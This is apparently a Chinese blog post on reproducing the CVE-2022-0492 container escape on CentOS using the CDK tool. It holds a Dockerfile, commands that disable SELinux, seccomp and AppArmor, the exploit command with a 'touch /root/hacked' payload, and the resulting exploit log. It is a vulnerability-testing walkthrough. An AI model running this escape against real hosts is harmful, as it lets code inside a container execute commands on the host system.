centos CVE-2022-0492漏洞复现方法 简单版
1. 下载最新 的 cdk 下载链接 https://github.com/cdk-team/CDK/releases
2、制作镜像:Dockerfile如下
FROM ubuntu:20.04
LABEL MAINTAINER kmahyyg<16604643+kmahyyg@users.noreply.github.com>
RUN echo "nameserver 223.5.5.5" > /etc/resolv.conf
RUN sed -i 's/archive.ubuntu.com/mirrors.aliyun.com/g' /etc/apt/sources.list && \
apt update -y && \
apt install -y ca-certificates wget curl nano strace ltrace socat libcap2-bin && \
rm -rf /var/cache/apt
CMD ["/bin/bash", "-c", "sleep 9999"]
docker build -t rinchat/test:CVE-2022-0492 .
已经上传到镜像仓库rinchat/test:CVE-2022-0492 拉取即可
3. 临时关闭selinux
setenforce 0
开启用户命名空间
echo user.max_user_namespaces=15000 >/etc/sysctl.d/90-max_net_namespaces.conf
sysctl -p /etc/sysctl.d /etc/sysctl.d/90-max_net_namespaces.conf
当前目录下有cdk 文件
4. docker run -d -v `pwd`:/test --security-opt "seccomp=unconfined" --security-opt "apparmor=unconfined" --name test rinchat/test:CVE-2022-0492
docker exec 容器内执行:./cdk run abuse-unpriv-userns "touch /root/hacked"
查看宿主机是否有 /root/hacked 目录有了则存在漏洞说明 容器内部可以执行宿主机命令
存在漏洞时候日志:
root@2de2c952ccf1:/test# ./cdk run abuse-unpriv-userns "touch /root/hacked"
2022/04/07 15:27:31 User-Defined Shell Payload: touch /root/hacked
2022/04/07 15:27:31 current cgroup for exploit: rdma
2022/04/07 15:27:31 user-defined shell payload is: touch /root/hacked
2022/04/07 15:27:31 Found hostpath: /var/lib/docker/overlay/648284107b18c61c6040f6f056307e4d7b8d55471af927b0581a5690d2e76f96/upper
2022/04/07 15:27:31 generate shell exploit with user-input cmd:
touch /root/hacked
final shell exploit is:
#!/bin/sh
touch /root/hacked > /var/lib/docker/overlay/648284107b18c61c6040f6f056307e4d7b8d55471af927b0581a5690d2e76f96/upper/cdk_cgres_XCXT
2022/04/07 15:27:31 shell script saved to /cdk_cgexp_XCXT.sh
2022/04/07 15:27:36 Execute Result:
测试发现4.11内核以上存在bug
内核下载链接:http://193.49.22.109/elrepo/kernel/el7/x86_64/RPMS/
docker 版本
[root@localhost ~]# docker version
Client: Docker Engine - Community
Version: 20.10.0
API version: 1.41
Go version: go1.13.15
Git commit: 7287ab3
Built: Tue Dec 8 18:54:00 2020
OS/Arch: linux/amd64
Context: default
Experimental: true
Server: Docker Engine - Community
Engine:
Version: 20.10.0
API version: 1.41 (minimum version 1.12)
Go version: go1.13.15
Git commit: eeddea2
Built: Tue Dec 8 18:58:04 2020
OS/Arch: linux/amd64
Experimental: false
containerd:
Version: v1.4.3
GitCommit: 269548fa27e0089a8b8278fc4fc781d7f65a939b
runc:
Version: 1.0.0-rc92
GitCommit: ff819c7e9184c13b7c2607fe6c30ae19403a7aff
docker-init:
Version: 0.19.0
GitCommit: de40ad0
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 无需6万激活码!GitHub神秘组织3小时极速复刻Manus,手把手教你使用OpenManus搭建本
· Manus爆火,是硬核还是营销?
· 终于写完轮子一部分:tcp代理 了,记录一下
· 别再用vector<bool>了!Google高级工程师:这可能是STL最大的设计失误
· 单元测试从入门到精通